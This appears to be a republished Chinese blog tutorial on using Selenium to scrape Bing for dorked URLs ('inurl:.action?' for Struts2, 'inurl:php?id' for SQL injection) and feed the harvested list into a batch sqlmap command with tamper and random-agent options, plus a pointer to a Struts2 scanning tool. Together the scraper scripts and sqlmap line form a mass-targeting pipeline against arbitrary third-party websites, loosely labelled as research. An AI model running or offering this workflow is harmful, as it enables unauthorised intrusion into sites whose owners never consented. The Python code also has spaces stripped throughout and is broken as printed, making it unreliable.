如何運用selenium在網(wǎng)上爬取已知漏洞

小編給大家分享一下如何運用selenium在網(wǎng)上爬取已知漏洞，希望大家閱讀完這篇文章之后都有所收獲，下面讓我們一起去探討吧！

成都創(chuàng)新互聯(lián)公司專注于和布克賽爾蒙古企業(yè)網(wǎng)站建設,響應式網(wǎng)站建設,電子商務商城網(wǎng)站建設。和布克賽爾蒙古網(wǎng)站建設公司,為和布克賽爾蒙古等地區(qū)提供建站服務。全流程按需定制，專業(yè)設計，全程項目跟蹤，成都創(chuàng)新互聯(lián)公司專業(yè)和態(tài)度為您提供的服務

selenium基礎知識

介紹

python做爬蟲，如果爬取靜態(tài)網(wǎng)頁，requests庫用作請求，bs4和lxml庫用作分析抓取的網(wǎng)頁內(nèi)容非常不錯；

現(xiàn)在各大搜索引擎都是動態(tài)加載，關于爬取動態(tài)網(wǎng)頁，我了解了一些方法：

1.直接url:找js的api接口

2.webkit 手工模擬js

3.scrapyjs scrapyjs相當于粘合劑的作用,可以將splash整合進scrapy中

4.splash+ docker

5.phatomjs + selenium 結合使用模擬瀏覽器，消耗大，不適合大型爬蟲

這里我們用方法5，不過phatomjs不再和selenium組cp（可以繼續(xù)用），而火狐和google也推出了無頭瀏覽器方式，所以我們用google瀏覽器的驅(qū)動來達成目標（調(diào)試時注意版本，不同版本的css和xpath選擇表達式可能不同）

我沒有用無頭方式，注意是便于調(diào)試加上我們僅僅是安全研究；如果讀者要用，繼續(xù)這樣修改即可：

chrome_options= Options()

chrome_options.add_argument("--headless")

driver=webdriver.Chrome(executable_path=(r'D:\selenium\chrome/chromedriver.exe'),chrome_options=chrome_options)

安裝selenium

下載驅(qū)動器：

https://www.cnblogs.com/freeweb/p/4568463.html

https://www.cnblogs.com/qiezizi/p/8632058.html

python安裝selenium庫即可（pipinstall selenium）

一些簡單的語法知識，大家自行搜索

selenium的FAQ

這點我還是要提出來，語法很簡單，關鍵調(diào)試很麻煩

1、無法定位元素

這個問題是沒有加載完網(wǎng)頁就取元素了，本來第一次是設置sleep()，可是會導致socket斷開，所以就用內(nèi)置的

importselenium.webdriver.support.ui as ui

wait= ui.WebDriverWait(driver,20)

printwait.until(lambda x: x.find_element_by_css_selector("#b_results> li.b_pag > nav > ul > li:nth-child(3) > a")).text

2、python的ascii編碼

importsys

reload(sys)

sys.setdefaultencoding(‘utf-8’)

3、元素不在視圖

最蛋疼的，尋找了好久方法

出現(xiàn)elementnot visible

用ActionChains模擬鼠標點擊

參考：

http://www.mamicode.com/info-detail-1981462.html

4、制定爬取目標

怎樣編寫呢？我們來搜索bing國際版本，爬取struts2可能存在的漏洞

如何運用selenium在網(wǎng)上爬取已知漏洞

5、編寫代碼

編寫過程，有興趣可以研究下，作者這里提幾點，其他語法還是簡單的搜索好了，然后一頁一頁的向下翻，收集每頁的網(wǎng)址；這里的 xpath和css選擇的語法和你下的瀏覽器驅(qū)動版本有關，進瀏覽器然后更改選擇代碼即可（不要說運行不了，親測可用的）

代碼：

#coding=utf-8

importsys

reload(sys)

sys.setdefaultencoding('utf-8')

importtime

fromselenium import webdriver

importselenium.webdriver.support.ui as ui

fromselenium.webdriver.common.keys import Keys

fromselenium.common.exceptions import TimeoutException

#引入ActionChains鼠標操作類

fromselenium.webdriver.common.action_chains import ActionChains

start_url="https://cn.bing.com/search?q=inurl%3a.action%3f&qs=n&sp=-1&pq=inurl%3a.action%3f&sc=1-14&sk=&cvid=DBCB283FC96249E8A522340DF4740769&first=67&FORM=PERE4"

urls=range(200)

m=0

s=[1,2,3,4,5,6,7,8,9]

driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")

wait=ui.WebDriverWait(driver,20)

driver.get(start_url)

forn in range(7,57):

ifn%2 == 1:#國內(nèi)版

i=7

else:

i=8

i=7

forj in s[0:]:

try:

#//*[@id="b_results"]/li[1]/h3/a國際版本

#printwait.until(lambdax:x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h3/a').get_attribute("href"))

#urls[m]=wait.until(lambdax:x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h3/a').get_attribute("href"))

#國內(nèi)版本

printwait.until(lambdax:x.find_element_by_xpath('/html/body/div[1]/ol[1]/li['+str(j)+']/h3/a').get_attribute("href"))

urls[m]=wait.until(lambdax:x.find_element_by_xpath('/html/body/div[1]/ol[1]/li['+str(j)+']/h3/a').get_attribute("href"))

m=m+1

exceptException as e:

continue

try:

printi

ActionChains(driver).click(wait.until(lambdax: x.find_element_by_css_selector("#b_results > li.b_pag >nav > ul > li:nth-child("+str(i)+") >a"))).perform()

exceptException as e:

continue

withopen("urlss.txt","a+") as f:

forurl in urls[0:]:

f.write(str(url))

f.write('\n')

f.close()

driver.quit()

實現(xiàn)效果

這里用的某公司的批量工具

工具鏈接：

https://www.jb51.net/softs/574358.html

提供一個開源的stu工具鏈接：github的開源項目，緊跟步伐，剛更新了前幾天的057

作者項目地址：

https://github.com/Lucifer1993/struts-scan

測試的效果圖如下：

如何運用selenium在網(wǎng)上爬取已知漏洞

補充

雖然sql的洞不好找，前兩年來打，是成片區(qū)的，現(xiàn)在不好了，但是作者還是寫了個爬取代碼

目標：搜索敏感詞語：inurl:php?id

代碼：

#coding=utf-8

importsys

reload(sys)

sys.setdefaultencoding('utf-8')

importtime

fromselenium import webdriver

importselenium.webdriver.support.ui as ui

fromselenium.webdriver.common.keys import Keys

fromselenium.common.exceptions import TimeoutException

#引入ActionChains鼠標操作類

fromselenium.webdriver.common.action_chains import ActionChains

start_url="https://cn.bing.com/search?q=inurl%3aphp%3fid%3d&qs=HS&sc=8-0&cvid=2EEF822D8FE54B6CAAA1CE0169CA5BC5&sp=1&first=53&FORM=PERE3"

urls=range(800)

m=0

s=[1,2,3,4,5,6,7,8,9,10,11,12,13,14]

driver=webdriver.Chrome(executable_path="D:/selenium/chrome/chromedriver.exe")

wait=ui.WebDriverWait(driver,20)

driver.get(start_url)

fori in range(1,50):

forj in s[0:]:

try:

urls[m]=wait.until(lambdax:x.find_element_by_xpath('//*[@id="b_results"]/li['+str(j)+']/h3/a').get_attribute("href"))

printurls[m]

m=m+1

exceptException as e:

e.message

printi

try:

ActionChains(driver).click(wait.until(lambdax: x.find_element_by_css_selector("#b_results > li.b_pag >nav > ul > li:nth-child(7) > a"))).perform()

exceptException as e:

continue

printm

withopen("urls.txt","a+") as f:

forurl in urls[0:]:

f.write(str(url))

f.write('\n')

f.close()

driver.quit()

測試效果

由于周期太長，沒有具體去測試，但是url是爬取下來的，我給出sqlmap的指令

（正在考慮shell多線程跑sqlmap，提供思路參考，學習為目的，漏洞很少很少了；shell多線程參考：https://blog.csdn.net/bluecloudmatrix/article/details/48421577）

sqlmap-murls.txt --batch--delay=1.3--level=3--tamper=space2comment--dbms=MySQL--technique=EUS--random-agent--is-dba--time-sec=10| tee result.txt

分析命令

1、sqlmap -m 指定文件

2、--delay 指定每次請求requests的間隔時間，默認0.5

3、--level 檢測請求頭，如來源，agent等，默認是1

4、--dbms=mysql 指定數(shù)據(jù)庫是mysql

5、--technique=EUS,(不做盲注的檢測，本來周期就長)

B:Boolean-based blind SQL injection（布爾型注入）

E:Error-based SQL injection（報錯型注入）

U:UNION query SQL injection（可聯(lián)合查詢注入）

S:Stacked queries SQL injection（可多語句查詢注入）

T:Time-based blind SQL injection（基于時間延遲注入）

6、tee管道命令，顯示在屏幕的同時輸出到文件中供我們分析

看完了這篇文章，相信你對“如何運用selenium在網(wǎng)上爬取已知漏洞”有了一定的了解，如果想了解更多相關知識，歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

當前標題：如何運用selenium在網(wǎng)上爬取已知漏洞
瀏覽地址：http://bm7419.com/article32/igsssc.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供自適應網(wǎng)站、網(wǎng)站收錄、做網(wǎng)站、服務器托管、網(wǎng)站內(nèi)鏈、企業(yè)建站

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源：創(chuàng)新互聯(lián)

猜你還喜歡下面的內(nèi)容